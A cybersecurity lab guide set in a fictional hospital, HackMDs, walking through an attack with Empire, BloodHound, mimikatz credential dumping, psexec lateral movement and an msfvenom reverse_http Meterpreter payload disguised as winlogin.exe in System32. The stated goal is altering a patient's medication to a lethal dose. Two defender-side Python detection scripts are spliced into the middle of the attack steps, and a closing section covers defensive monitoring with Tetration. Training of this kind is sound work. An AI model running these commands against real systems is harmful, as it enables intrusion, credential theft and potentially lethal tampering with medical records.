    Empire implants work differently than you might think. While some tools (Immunity Canvas, Metasploit Framework, or Core Impact) act more like RATs, or Remote Access Trojans, Empire uses an implant-based approach. The agent checks from time to time for new commands or to deliver data to a remote command and control server. This check-in process is similar to beaconing, versus leveraging a persistent tunnel. Empire is great for hiding communication between the attacker and implants, making it an extremely effective method to own a target. In this scenario, you will begin to interact with our Empire Agents.
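    The check-in behavior described above, seen from the SOC's side, as an added example (not Empire code, and not a reproduction of any Empire setting): it parses a constructed, simplified proxy log and flags client/destination pairs whose requests recur at a near-constant interval, which is what periodic check-ins look like next to ordinary, bursty browsing. The log format, thresholds and addresses (203.0.113.0/24 is a documentation range) are assumptions.

```python
"""Spotting beacon-style check-ins in a web proxy log.

Added defender-side example; not Empire code and not based on any Empire
setting. Log format, thresholds and addresses are constructed assumptions.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# constructed format: <iso timestamp> <client ip> <destination host> <request path>
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<dst>\S+)\s+(?P<path>\S+)$")


def parse_log(lines):
    """Return a list of event dicts; malformed lines are skipped."""
    events = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        events.append({"ts": datetime.fromisoformat(m["ts"]), "src": m["src"],
                       "dst": m["dst"], "path": m["path"]})
    return events


def beacon_candidates(events, min_count=8, max_cv=0.15):
    """Group requests by (client, destination). A pair with at least `min_count`
    requests whose inter-request gaps have a coefficient of variation
    (stdev / mean) at or below `max_cv` is reported as a beacon candidate.
    Bursty browsing has a high CV; periodic check-ins have a low one."""
    stamps = defaultdict(list)
    for e in events:
        stamps[(e["src"], e["dst"])].append(e["ts"])
    candidates = {}
    for pair, ts in stamps.items():
        if len(ts) < min_count:
            continue                      # too few requests to judge regularity
        ts.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue                      # duplicate timestamps, nothing periodic
        cv = statistics.stdev(gaps) / mean
        if cv <= max_cv:
            candidates[pair] = {"count": len(ts), "mean_gap_s": round(mean, 2),
                                "cv": round(cv, 3)}
    return candidates


# Constructed sample: 10.1.1.51 browses normally; 10.1.1.50 checks in with
# 203.0.113.10 roughly every 5 s, and also fetches updates every 11 minutes.
SAMPLE_LOG = """\
2021-11-05T09:40:00.000 10.1.1.51 www.example.com /
2021-11-05T09:40:30.000 10.1.1.51 www.example.com /news
2021-11-05T09:41:00.000 10.1.1.50 updates.example.net /check
2021-11-05T09:45:00.000 10.1.1.50 203.0.113.10 /api/v1/status
2021-11-05T09:45:05.000 10.1.1.50 203.0.113.10 /api/v1/status
2021-11-05T09:45:10.200 10.1.1.50 203.0.113.10 /api/v1/status
2021-11-05T09:45:14.900 10.1.1.50 203.0.113.10 /api/v1/status
this line is malformed and must be skipped
2021-11-05T09:45:20.100 10.1.1.50 203.0.113.10 /api/v1/status
2021-11-05T09:45:25.000 10.1.1.50 203.0.113.10 /api/v1/status
2021-11-05T09:45:29.800 10.1.1.50 203.0.113.10 /api/v1/status
2021-11-05T09:45:35.100 10.1.1.50 203.0.113.10 /api/v1/status
2021-11-05T09:45:40.000 10.1.1.50 203.0.113.10 /api/v1/status
2021-11-05T09:45:44.900 10.1.1.50 203.0.113.10 /api/v1/status
2021-11-05T09:47:10.000 10.1.1.51 www.example.com /news/item1
2021-11-05T09:47:15.000 10.1.1.51 www.example.com /news/item2
2021-11-05T09:49:15.000 10.1.1.51 www.example.com /search
2021-11-05T09:50:15.000 10.1.1.51 www.example.com /about
2021-11-05T09:52:00.000 10.1.1.50 updates.example.net /check
2021-11-05T10:03:00.000 10.1.1.50 updates.example.net /check
2021-11-05T10:05:15.000 10.1.1.51 www.example.com /contact
"""


def run_sample(min_count=8, max_cv=0.15):
    return beacon_candidates(parse_log(SAMPLE_LOG.splitlines()), min_count, max_cv)


if __name__ == "__main__":
    for (src, dst), info in run_sample().items():
        print(f"{src} -> {dst}: {info['count']} requests, "
              f"mean gap {info['mean_gap_s']}s, cv {info['cv']}")
```

    Lowering min_count makes the regular but infrequent updates.example.net fetches surface as well, which is why the count floor and the CV ceiling have to be tuned together against your own baseline.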

    Procedure


     1   

    Click back on the main browser to get back to the default GUAC terminal window. Select the Kali Linux session to return to that session.

     2   

    On your Empire terminal you should see something ‘SIMILAR’ to this but not quite with the same verbiage as shown. Your agent will have a different agent GUID than this example. Currently mine is set to K49HUM86 but yours will be different.

     3   

    Let’s rename our agent so that we can keep track of which agent is which. To rename the agent, use the following commands:

     4   

    Press Enter to access the command terminal. Empire will show the "(Empire) >" command prompt when you press Enter within the terminal window.

     5   

    Type “stager/windows/launcher_bat”

     6   

    Type “agents”

     7   

    Type “rename <ID> DR”

     8   

    When this is done you can now type “agents”. This will show you the agents listed. You should see your agent is now called DR.

     9   

    If you type help on this screen, you will see a variety of items; some of the more interesting ones are working-hours, losslimit, and autorun. You can explore executing these and other commands during a break.

    Note: 

    *HACKMDS\dhowser has an asterisk, which means that this particular agent is running with administrator privileges on the device, which is elevated system access.

     10   

    Interacting with a specific implant can be done by using the interact command. Let’s do this now. Type “interact DR” to interact with the infected DR workstation. Let’s do some basic reconnaissance of the system now that we can interact with it.

     11   

    Type the command “sysinfo”. It may take a minute to generate a response. You will see debugging information along with other interesting information.

     12   

    Before we explore more advanced use cases with our infected system, let’s see if we can find out some more information about the system, such as what antivirus is running on it. Press Enter to bring up the "(Empire: DR) >" prompt. Type the command “usemodule situational_awareness/host/antivirusproduct” to select the proper module. You can press Tab to auto-complete each part of this command.

     13   

    Type “run”. When you run this command, you will notice that there is no antivirus/antimalware installed. This is by design for our lab, but in a real environment you are likely going to see it installed. It may take a minute or two for the results to show.

     14   

    Next type “back” to return to the main command prompt.

     15   

    Now run the following module to find the Domain Controllers:

     16   

    usemodule situational_awareness/network/powerview/get_domain_controller

     17   

    (Empire: powershell/situational_awareness/network/powerview/get_domain_controller) > execute

     18   

    Using the information you found, you can now add AD 1 to the list of identified devices.

    Where are you now?

    At this point, you have launched a ransomware attack to distract the HackMDs SOC. You planted an Empire dropper and used it to launch tasks from the infected system. You researched the type of system that is infected and what type of antivirus is installed. You also identified the HackMDs AD system, which is a great next target. You did all of this in a fileless manner to evade detection from antivirus and other file-based security tools.

    There are many approaches Mr. Black could take from this point. One possibility is to dump the DNS records and research systems until a potential target is identified. Another approach is to scan the network and attack anything that has vulnerabilities. A third approach could be to spread malware through the AD system, which likely has holes in the firewall and access to multiple virtual networks.

    For this lab, Mr. Black’s goal is to gain access to the electronic medical record (EMR) portal containing the CEO’s data. This way he can modify treatment to a lethal dosage. That portal that controls this information is emr.hackmds.com and only available to those with the proper credentials. This means Mr. Black needs to land domain administration level access. He assumes Dr. Peterson would have this since he has been the person on the news representing the lead caretaker of the CEO. At this point, anybody with domain level access would be ideal.

    Now that you, as Mr. Black, have inside access, it’s time to pivot to other systems and launch attacks from the inside until you can land administration-level access. Once domain-level access is accomplished, we can either target Dr. Peterson or see if domain access will get us into the emr.hackmds.com portal with rights to modify the CEO’s medical treatment. We will take that action once we get to that point in the attack and assess the situation.

    Let the attack continue...


    Find More Admins: Part 1

    Understanding who has what privilege on a Microsoft Domain and where those particular Administrators log in is one challenge an attacker faces. In this scenario, you will use a tool called "Bloodhound" that ingests information about the domain; for example, who has what rights, who is logged into what computer, and more.

    The attacker, Mr. Black, will leverage this information about the domain and where HackMDs users are currently logged in. You will specifically look for other administrators logged in and at the systems to which they might be connected.

    When you have gained access to these systems, you can dump password hashes and retrieve log-in information for more systems. Will one of these systems allow us access into patient biomedical controls? Let's see what we can get using Bloodhound.

    Reminder: You must log in as specific users for this lab to work. If you have not done this already, then you may not see the same results you will see in this guide as you go through the demo.

    Important: 

    For this lab to work, you must log in to Jumphost 2 and the Dr. workstation. Jumphost 2 represents lpeterson, who will be a target for the attack. Please log in to Jumphost 2 and the Dr. workstation before you continue this scenario.

    Procedure


     1   

    First, we will need to create the Bloodhound data from within the DR’s machine. We can do this by first starting a Bloodhound Agent. Use the following commands:

    Caution: 

    usemodule will fail if you do not use the Back command to back out of the existing module.

    • usemodule management/invoke_script
    • set ScriptCmd Invoke-BloodHound -CollectionMethod All
    • set ScriptPath /working/SharpHound.ps1
    • info
    • execute

    Tip: 

    Depending on the size of your window, you might see the commands drop to the next line. If this happens, ignore it and continue typing.

     2   

    Verify the commands with the info command before executing.

     3   

    Wait up to five minutes for the script to run.

     4   

    Enter the following commands:

    • "back"
    • "shell dir"

    This will return a listing of files in the Temporary Internet Files directory.

     5   

    The BloodHound zip file is provided in the following way:

    • <timestamp>_BloodHound.zip

     6   

    In the example above, it is 20190604235313_BloodHound.zip

    Tip: 

    If you don't see the file yet, just give it another minute or so and run the "shell dir" command again.

     7   

    To download this file to your computer, run the following command: download <filename>

     8   

    Observe that in the above example it would be: "download 20190604235313_Bloodhound.zip"

    This would download it to a path that is similar to the source:

     /opt/Empire/downloads/<Machine ID>/c/Users/Dhowser/AppData/Local/Microsoft/Windows/Temporary Internet Files

    Note: 

    Pay attention: the machine's original ID, from before it was renamed to DR, is used in the path. Make note of this for when you need to browse to the BloodHound zip file.

     9   

    Locate the BloodHound icon on the Kali desktop (Red Dog Icon) and launch it.

     10   

    When you have launched BloodHound, you will see it pause for a moment while it logs in.

    Note: 

    If you get a "No Database Found" error message, open a terminal window, and type "neo4j stop" followed by "neo4j start" to reboot the database. Then, re-open Bloodhound.

     11   

    When you are logged in, upload the SharpHound file into the system: Click the Upload icon.

     12   

    Remember the location above because you will need to browse for it later.

     13   

    Click Other Locations > Computer, and then enumerate the path to locate the file: /opt/Empire/downloads/<Machine ID>/c/Users/Dhowser/AppData/Local/Microsoft/Windows/Temporary Internet Files

    Tip: 

    If you do not see the file within the Downloads folder (aka, the unique Machine ID), try downloading it a second time.

     14   

    Review the "Upload Progress" window.

     15   

    Close the Upload Window.


    Find More Admins: Part 2

    At this point, you are ready to investigate what details you collected.

    Procedure


     1   

    When the upload is complete, you can use the hamburger menu in the left corner of the screen to perform pre-built queries. Click the hamburger icon, then click Analysis.

     2   

    Choose the “Shortest Path to Domain Admins Query”, then select the domain "DOMAIN ADMINS@AD.HACKMDS.COM"

    Note: 

    It is sometimes much better for an attacker not to be so sloppy as to go straight after Domain Admin. There are more elegant ways to stay stealthy in Active Directory. For this lab, we are just going to “go for it”. 

     3   

    From here, what you will see is a list of nodes. These nodes represent items in Active Directory. They could be Users, Computers, Groups, Permissions, Sessions, Access Control Lists and more. For the purposes of our graph, what we have is the Domain Admins group on the right and a set of Users belonging to that group. In addition, we have Users that are administrators on the Active Directory computer. If we can land on this computer as a local administrator, we may be able to read the password hash of a Domain Administrator on that computer and move further into the domain. You can click the hamburger menu to remove the query popups and see the entire diagram. It looks like our next computer to attack is Jumphost.  

    Note: 

    Your build out may not be laid out as below, but it will be similar.

     4   

    Jumphost 1 was chosen because both "DHOWSER" and “Administrator” have accounts on it. (Remember, you should have logged into jumphost2. If not, those login credentials will NOT be in memory.)

     5   

    Now that we have found our next potential target, our next goal is to gain access. Go back to the "empire" implant, and click the Empire tab.

     6   

    Press Enter to bring back the prompt.

     7   

    Our next step is to attempt to dump the known user credentials on the DR's system, which should work because we are running as a user that is a local administrator on that system. This process runs in PowerShell and is fairly intrusive on the CPU of the host. One of the tradeoffs for not being an actual binary is a performance hit on the remote system. This is important to know because it decreases the attacker's ability to fully hide. We will use the built-in "mimikatz" function from Empire.  

     8   

    Mimikatz is a Windows post-exploitation tool written by Benjamin Delpy (@gentilkiwi). It allows for the extraction of plaintext credentials from memory, password hashes from local SAM/NTDS.dit databases, advanced Kerberos functionality, and more.

     9   

    Type "mimikatz" from the DR prompt.

     10   

    After the task is initiated, you will see a dump of the LSA information on the screen.

     11   

    Did you catch all that and jot it down as it went by? Just kidding!

     12   

    Typing the "creds" command will allow us to see the credential store populated by mimikatz.

     13   

    Here we can see the user, the domain, and the plaintext password of C1sco12345. Note you may need to move the terminal window screen wider to see all passwords.

    Next, we need to find the IP address of our Jumphost target. We want to issue an nslookup for our target on the DR workstation.

     14   

    Issue the following command at the (Empire: DR) prompt:

    shell nslookup jumphost.ad.hackmds.com

    BAM! That worked! Now that you have your target’s user credentials and IP address, you can log in to that device and pivot to that system. For our lab, you can see the password for a few different user accounts, including “dhowser” as user with password C1sco12345. You can use these credentials to access the Jumphost, our target system.

     15   

    To access the target system, type “usemodule lateral_movement/invoke_psexec” and press Enter.

     16   

    Type “info” and see the options presented to you.

     17   

    We need to set up this module. Type the following commands to configure the module:

    • set Listener http
    • set ComputerName 198.19.10.50
    • execute
    • Type “y” when prompted about module not opsec safe, run?

    Note: 

    The 198.19.10.50 agent will not communicate using that IP address. Because we are using our Bastion host, it will contact this host directly. Notice that the contact back is 198.18.133.50. This is a quirk of our lab. Because of this, you will not see much indication from our NetFlow (Stealthwatch) or Firewall (Firepower) system. For these, we will use a different host.

     18   

    When this task runs, you should have a new agent connected to the jumphost system found at 198.18.133.50.

     19   

    Type “agents”. This takes you back to the Agents menu.

     20   

    To rename the agent to JUMPHOST, type “rename <AGENT> JUMPHOST” where <AGENT> is the current name. For the next example, the agent name is MSC3y64W.

     21   

    When the operation has completed, type agents again, and observe the name on the left changed to JUMPHOST.


    Interact with Jumphost1

    In this scenario, you will interact with our new agent.

    Procedure


     1   

    At the command prompt, type “interact JUMPHOST”. You should now see the command prompt shows JUMPHOST.

     2   

    As in the prior step, let's run mimikatz on the jumphost to gain access to passwords of other users found within this system's memory.

     3   

    Just like before, you will see a dump of the credentials on the JUMPHOST. Scroll by these.

     4   

    Type "creds" to see a list of all the credentials from the two runs.

     5   

    The specific user we are after is lpeterson (Lawrence Peterson). This user is our target doctor, whose system we can leverage to get close to the targeted CEO being treated at the hospital.

    Note: 

    Empire is great for getting us login credentials to the target’s system; however, what if we wanted to attack the HackMDs website and do some manipulation? For example, we find that the CEO’s medical dosages can be controlled from a patient portal. Modifying these could turn the treatment into a weapon! Some options for manipulating a website might include:

    • VPNs can be provisioned since you now have a valid credential.

    • VPNs for the valid credentials already exist.

    • You can install a better remote agent tool that allows for pivoting.

    Now, we will go ahead and get another Implant going. There is another host that is on the network that we will use to build the appropriate artifacts. During our Bloodhound exercise Mr. Purple sees a workstation called WOW.AD.HACKMDS.COM. We will put an implant on that system as well.

     6   

    In Empire, type the following:

    • (Empire: JUMPHOST) > agents
    • (Empire: agents) > interact DR

     7   

    To find the IP address of our target: Issue an nslookup for our target on the DR machine.

     8   

    (Empire: DR) > shell nslookup wow.ad.hackmds.com

     9   

    Just as you did in previous steps, you will again invoke psexec to install the agent dropper on the wow workstation and allow us to access it via empire.

     10   

    Now type

    • (Empire: DR) > usemodule lateral_movement/invoke_psexec

    • (Empire: powershell/lateral_movement/invoke_psexec) > set ComputerName 198.19.30.100

    • (Empire: powershell/lateral_movement/invoke_psexec) > info -- (Notice that the listener is still http from the prior run)

    • (Empire: powershell/lateral_movement/invoke_psexec) > execute

    • Answer Y to the “Module is not opsec safe, run?” prompt.

     11   

    You should see a new connection back in your agents list. Now let’s type the following:

    • (Empire: powershell/lateral_movement/invoke_psexec) > agents

    • (Empire: agents) > rename <AGENT ID> WOW

     12   

    To get the credentials of this system, you can run mimikatz on the target system:

    • (Empire: agents) > interact WOW

    • (Empire: WOW) > mimikatz

    You will see a list of credentials scroll by as the job completes. Type creds to see all the credentials in the credential database at this time.

    In the next scenario, we will install a better remote agent tool known as a Meterpreter on the target system.


    Upgrade to Meterpreter

    In this scenario, we will build a tunnel into the HackMDs internal network and browse it with full keyboard access. To do this, we need to enable port forwarding. Unfortunately, Empire is a lightweight implant so it doesn’t offer this functionality. For this reason, we must switch to a different remote agent that we call a Meterpreter.

    What is the difference between a lightweight agent and a full Remote Access Toolkit (also known as a RAT)? Intentionally behaving like a RAT, Meterpreter has facilities for routing and switching live traffic. Empire acts more like an agent that checks in and does work. This means Empire cannot offer functionality like modifying routing. Because we want to build a proxy on the target, we will use a Meterpreter to accomplish this task.

    In order to upgrade our access to a RAT, we are going to perform the following tasks:

    • Enable a multi-handler.

    • Configure a foreign listener.

    • Execute the agent.

    Let's begin!

    Procedure


     1   

    Open a new terminal window and type the following:

    • root@kali:/# cd /root

    • root@kali:~# msfconsole

     2   

    When Metasploit launches, you might see errors, but you will eventually see the following prompt:

     3   

    Type “jobs -K” to kill any existing jobs.

     4   

    Type “show options”.

     5   

    We need to modify this exploit for our target. Use the following commands to modify the exploit.

    • msf exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_http

    • msf exploit(multi/handler) > set LPORT 81

    • msf exploit(multi/handler) > set LHOST 198.18.133.6

    • msf exploit(multi/handler) > run -j

     6   

    Your results should look like the following

     7   

    Next, we need to create a stageless meterpreter that will upgrade our shell access within the target. We are going to do this using our new reverse handler we just established to 198.18.133.6

     8   

    Open a new terminal. Type the following commands to connect through our new established connection. Make sure the listening port matches whichever port you used.

    • root@kali:~# cd /working

    • root@kali:/working# msfvenom -p windows/x64/meterpreter_reverse_http LHOST=198.18.133.6 LPORT=81 -f exe -o /working/winlogin.exe

     9   

    We intentionally called it winlogin.exe, which is only one character off Microsoft’s winlogon.exe. Our goal was to try to obfuscate the bad program from the actual good one by making it harder to detect.

    Note: 

    The major difference between stageless Meterpreter and staged Meterpreter is that a staged Meterpreter is very small and only contains enough information to download the entire Meterpreter RAT. A stageless Meterpreter contains everything.

     10   

    You should see that a payload was created and saved as /working/winlogin.exe.

     11   

    Recall the reasons we are performing this attack. Our goal is for Mr. Black to be able to modify the CEO’s medicine dosage, which is managed by the patient portal. Let’s first test to see if we can access the system. While still on the Kali system, open a web browser.

     12   

    Go to http://emr.hackmds.com. (Note the DNS name is HACKMDS.COM, not AD.HACKMDS.COM) This is located on the DMZ server and what luck, we hit it but can’t access it from the outside. We need to get inside to be able to log into it.   

     13   

    Next, we will launch our Meterpreter session and pivot through the JUMPHOST we previously compromised. Go back to your Empire terminal. It is the one with the JUMPHOST prompt as shown.

     14   

    Type the command “upload /working/winlogin.exe C:\windows\system32\winlogin.exe”. This uploads the Meterpreter we just created over our Empire lightweight connection. We could put this in any directory, but we are trying to avoid detection, so we placed it in the windows\system32 folder along with other system programs.

     15   

    Let’s validate this worked. Type the command “shell dir c:\windows\system32\winlogin.exe”. You should see winlogin.exe returned with the date of the lab as the creation date. We now know this is the file you just dropped on the WOW device.
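    The same `shell dir` listings look different from the defender's side. The following Python script is an added example, not part of the lab or of Empire: it parses a constructed Windows `dir` listing and flags the two artifacts this guide has produced so far, a SharpHound `<timestamp>_BloodHound.zip` archive (from the Find More Admins procedure) and a file in System32 whose name is one edit away from a legitimate system binary, like winlogin.exe beside winlogon.exe. The known-good name list, file sizes and dates are constructed for the example.

```python
"""Triage a Windows `dir` listing for artifacts left behind in this lab.

Added example (not the lab's or Empire's code). Flags:
  * SharpHound output archives named <14-digit timestamp>_BloodHound.zip
  * files whose name is within edit distance 1 of a known system binary
    but is not itself known (e.g. winlogin.exe masquerading as winlogon.exe)
"""
import re
from datetime import datetime

# One line of `dir` output: "MM/DD/YYYY  HH:MM AM|PM   <size or <DIR>>   name"
DIR_LINE = re.compile(
    r"^(?P<date>\d{2}/\d{2}/\d{4})\s+(?P<time>\d{2}:\d{2} [AP]M)\s+"
    r"(?P<size><DIR>|[\d,]+)\s+(?P<name>\S.*?)\s*$"
)
# SharpHound names its archive after the collection time, e.g. 20190604235313_BloodHound.zip
SHARPHOUND_ZIP = re.compile(r"^(?P<ts>\d{14})_BloodHound\.zip$", re.IGNORECASE)

# Constructed sample listing; sizes and dates are illustrative only.
SAMPLE_LISTING = """\
 Volume in drive C has no label.
 Directory of C:\\Windows\\System32

06/04/2019  11:53 PM    <DIR>          .
03/18/2019  09:45 PM           720,896 winlogon.exe
03/18/2019  09:45 PM           123,904 wininit.exe
06/04/2019  11:58 PM           208,384 winlogin.exe
06/04/2019  11:53 PM         1,048,576 20190604235313_BloodHound.zip
"""

# Constructed allow-list; in practice derive it from a golden image of the host.
KNOWN_SYSTEM_BINARIES = {"winlogon.exe", "wininit.exe", "lsass.exe", "svchost.exe"}


def parse_dir_listing(text):
    """Return a list of {name, size, mtime} for regular files in a `dir` listing."""
    entries = []
    for line in text.splitlines():
        m = DIR_LINE.match(line)
        if not m or m.group("size") == "<DIR>":
            continue  # header lines and sub-directories are not of interest here
        mtime = datetime.strptime(f"{m.group('date')} {m.group('time')}", "%m/%d/%Y %I:%M %p")
        entries.append({
            "name": m.group("name"),
            "size": int(m.group("size").replace(",", "")),
            "mtime": mtime,
        })
    return entries


def levenshtein(a, b):
    """Edit distance between two strings (standard dynamic programme)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def find_lookalikes(names, known=KNOWN_SYSTEM_BINARIES, max_distance=1):
    """Names that are not known but sit within max_distance edits of a known name."""
    hits = []
    for name in names:
        low = name.lower()
        if low in known:
            continue
        for good in sorted(known):
            if levenshtein(low, good) <= max_distance:
                hits.append((name, good))
    return hits


def find_sharphound_archives(entries):
    """(name, collection time) for files that follow SharpHound's output naming."""
    found = []
    for e in entries:
        m = SHARPHOUND_ZIP.match(e["name"])
        if m:
            found.append((e["name"], datetime.strptime(m.group("ts"), "%Y%m%d%H%M%S")))
    return found


def triage(listing_text):
    """Run both checks over one listing and return the findings."""
    entries = parse_dir_listing(listing_text)
    return {
        "lookalikes": find_lookalikes([e["name"] for e in entries]),
        "sharphound_archives": find_sharphound_archives(entries),
    }


if __name__ == "__main__":
    for kind, hits in triage(SAMPLE_LISTING).items():
        for hit in hits:
            print(f"{kind}: {hit}")
```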

     16   

    Now that our Meterpreter is installed, let's run it by typing the following command:

     17   

    (Empire: JUMPHOST) >shell c:\windows\system32\winlogin.exe 

     18   

    Go back to the Metasploit console tab you previously opened. You should now see a connection event is live.

     19   

    You can now interact with this session in Metasploit. This can be used to build a tunnel between our attack machine on port 1111 and the remote webserver. Use the following commands to accomplish this. The default first session should be 1, but to validate you may type "sessions -l".

     20   

    Let's connect to the session and add a port forward using the session we just established.

     21   

    msf exploit(multi/handler) > sessions -i 1

     22   

    meterpreter > portfwd add -l 1111 -p 80 -r 198.19.20.5

     23   

    At this point, you should be ready to attack the emr.hackmds.com webserver.


    Mr. Black Wins!

    Procedure


     1   

    How can we get to emr.hackmds.com from our localhost? We need to modify the routing table to do this. With our newly established Meterpreter session, we can accomplish this goal. Then, we can use our stolen credentials and access the CEO’s medical records. Our attacker goal is within reach...

     2   

    In a new terminal window, type the following command to edit the host file.

    • root@kali:~# leafpad /etc/hosts

     3   

    Configure the file so that emr.hackmds.com resolves locally. Add the line “127.0.0.1    localhost emr.hackmds.com” as shown.

     4   

    Save and close this file.

     5   

    Now, attempt to access the web portal from the browser. This time, click http://emr.hackmds.com:1111.

     6   

    What username and password do you need to use? Let’s examine the known passwords we have collected:

    Username        Password
    dhowser         C1sc012345
    administrator   C1sc012345
    nurse           C1sco12345
    lpeterson       !!coco92!!

    Which login works? Is it Administrator/C1sco12345? How about dhowser/C1sco12345? Maybe lpeterson/!!coco92!!? Remember lpeterson was a doctor we were targeting that is treating our target CEO (Emily Williams).

    When you find the login, you will have access to the patient portal and can modify the CEO’s medical dosage. Keep in mind that this can be lethal if done incorrectly!

    Monitor Threats and Performance with Tetration

    Value Proposition: For this scenario, you will play out the role of an externally managed service provider assigned to monitor HackMDs’s datacenter. You are fortunate to have Cisco Tetration, which has mapped out all application dependencies, providing complete visibility into communications and potential risks. HackMDs has asked for a whitelist approach to access within the datacenter. This approach provides access to only what is required for successful operation and monitoring for potential risks. Risks include vulnerabilities, unauthorized access, or gaps in the access control policies.

    The following diagram demonstrates Cisco capabilities.

    In the world of security, a whitelist is more secure than a blacklist approach. However, many organizations are forced to use a blacklist approach, due to the challenges with whitelist enforcement. Cisco Tetration overcomes those challenges by dynamically learning what is considered “trusted” and dynamically adjusting access rules in real time allowing whitelist security to become a reality.

    Many organizations will outsource monitoring of their network to a managed service provider. Agreements typically include specific monitoring points and types of service such as Tier 1 Support. For this scenario, you will play the role of an analyst working for the managed service provider assigned to monitor the HackMDs datacenter. Your job is to alert the HackMDs SOC of potential compromises, as well as provide a daily status of top potential risks. You are provided access to HackMDs’s Cisco Tetration deployment, from which you can investigate any application and communication within the HackMDs datacenter.

    Important: You are not permitted to make any changes to policies. HackMDs’s plan is to let Cisco Tetration dynamically adjust whitelist policies without any user interaction. Your only job is to validate potential risk and report.

    Lab Resources

    • Resource 1: Jumphost1 representing the managed service analyst computer

    • Resource 2: Tetration installed within the HackMDs datacenter

    Access Tetration

    It is time to start your shift at Michael Hackson’s Monitoring service. You have been assigned to monitor the HackMDs datacenter. Your first step is to log into a Cisco Tetration solution currently installed within the HackMDs datacenter.

    Procedure


     1   

    Connect to jumphost 1.

     2   

    Open a web browser and go to https://198.19.193.228. You should see the Cisco Tetration interface.

     3   

    Log in with username mslab@dcloud.cisco.com and password C1sco12345!

     4   

    You should now be logged into the main Cisco Tetration GUI. Since your focus is security, the first step is to access the security dashboard. On the left side of the management interface are the different main Tetration functions. Choose the third one down for security and select the Dashboard.

     5   

    You should see the main security focused dashboard.

     6   

    Your first task is to validate and report any potential vulnerabilities. To view vulnerabilities within the datacenter, click the Vulnerability Score widget.

     7   

    This will bring up a vulnerability focused dashboard. On the left, you will see a workload score distribution with different workloads. Click the top one to see what potential vulnerabilities exist. What you will find when viewing a workload is a list of different potential vulnerabilities within the associated workload. CVSS scores of 8 or higher are considered extremely vulnerable and should be documented for HackMDs to address.

     8   

    Click one of the CVE values, and it opens a website to NIST where you can learn about the details associated with the identified vulnerability.

     9   

    Click outside the Vulnerability Details pop-up to bring the Tetration vulnerabilities overview dashboard back to the forefront.

     10   

    Scroll down until you see the Attack Surface Score widget. Once again, you will see different applications on the left. Choose the top application to bring up details regarding ports used by this application. You will find there are a lot of unused ports. For this example, I’m seeing almost a thousand unused ports in the next image. This application could potentially be exploited if left on an accessible part of the network. This will need to be documented and addressed by the HackMDs datacenter vulnerability management team.

     11   

    Click outside the pop-up to return to the vulnerability dashboard. Next, let’s run a forensic review of things that could potentially be bad. Click the left menu, select Security and choose Forensics Analysis.

    Note that Cisco Tetration has visibility inside the endpoint and into traffic between endpoints. This enables end-to-end forensics, which is extremely effective for identifying advanced insider threats. Tetration will monitor for things it has never seen before, privilege escalation, side channel attacks, meltdowns and many other threats that many datacenter administrators are blind to, since they occur within the datacenter and are typically executed with stealth in mind.

    You should see any recent events that could be a risk shown on the forensic timeline. You can also move the time range bar and look back to when there are spikes of activity. The first example shows an unusual command.

     12   

    Scroll back to the last spike in activity to find an event where multiple unseen commands were found.

     13   

    Try clicking one of the events. You will pull up a forensics event workflow showing how the execution of the unseen command flowed. This is extremely useful for understanding what occurred and making a more accurate judgment about the event. This type of feature is common with sandbox technology, which runs potential threats and monitors what changes they make to the system as they run within the sandbox. Remember, proper security requires People, Process and Technology; best practice includes a process of validating forensic events to ensure they are real threats, rather than assuming a security technology will block anything bad 100% of the time. Try clicking and playing a few flagged processes to see what they did at the time Tetration recorded the incident.

    Note: Cisco Tetration can be set up to automatically prevent certain activities tied to known malicious behavior. For this situation, the Michael Hackson Monitoring Corporation is not authorized to invoke any changes. Your job is to observe and report anything potentially malicious.

    Notice that one of the processes is highlighted in orange. This represents the command of interest.

     14   

    To go even deeper into your investigation, click the process highlighted in orange. In this example, it is C:\Windows\System32\ceipdata.exe.

    Now, you can see multiple details about the situation. For example, you can see which user made the change, what commands are considered unseen, what commands were executed, and all other associated commands.

    Spend some time looking at the different forensic events.

    Now that you have reviewed the security posture of HackMDs, your next task is to identify and resolve any application performance issues. This is typically a challenge for organizations, because it is difficult for a managed service provider who is not onsite to determine if the issue is network or application-related. Luckily, you have access to Cisco Tetration, which can look deep into the TCP performance and answer these types of questions. If the application is causing the problem, Tetration can also determine if the issues are on the client side or part of the application itself.

     15   

    Go to the left side menu, click Visibility, and then select Flow Search.

     16   

    You will see the traffic flow within the HackMDs datacenter. Let’s narrow down our search from all time to the last month. Click the time range, which will bring up time range options. Select 1 month and you should see any traffic spikes in the last month like the one shown in the next example.

     17   

    What you see is traffic spikes, but that doesn’t necessarily mean the applications within the datacenter couldn’t handle the traffic. To check application performance, click the filter drop-down option and select App Latency. Now you can see any performance issues.

     18   

    To better understand what is causing the issue, we can add a filter for TCP Performance and choose which issue to filter into. Click the filter bar and type TCP Performance. Then select = and you will see four different options to filter into. The top three represent the application, client side or provider being the cause of the issue. Your role represents the network team so your concern would be anything that is the network’s fault. Select Network Limited.

     19   

    Click the Filter Flows button to see if there are any network-related issues that would impact the HackMDs datacenter applications. Since there are no network-related issues in our example, we will report that any performance issues were not caused by the network. You may find a network issue when you perform this lab. In my case, all reported application issues are not a network issue.


    Summary

    This wraps up your duties for monitoring HackMDs’s datacenter for security and application performance issues. Steps that could take hours to perform, if even possible, with traditional tools can be done within minutes using Cisco Tetration.

    Feel free to look more at HackMDs’s datacenter before you end your shift.

    Additional tasks you can take are:

    • Investigate application performance issues and determine if they are client or application related.

    • Look at the different applications running within HackMDs’s datacenter and their relations.

    • Map out which ports and protocols are used by which applications.

    • Investigate policies that exist within the HackMDs datacenter.

    • View various workloads and associated diagnostics.

    When you are done, remember to turn in your timecard before you end your workday!

    Congratulations! You have now completed this scenario.

    Cyber Defense Response Challenge: Incident Response

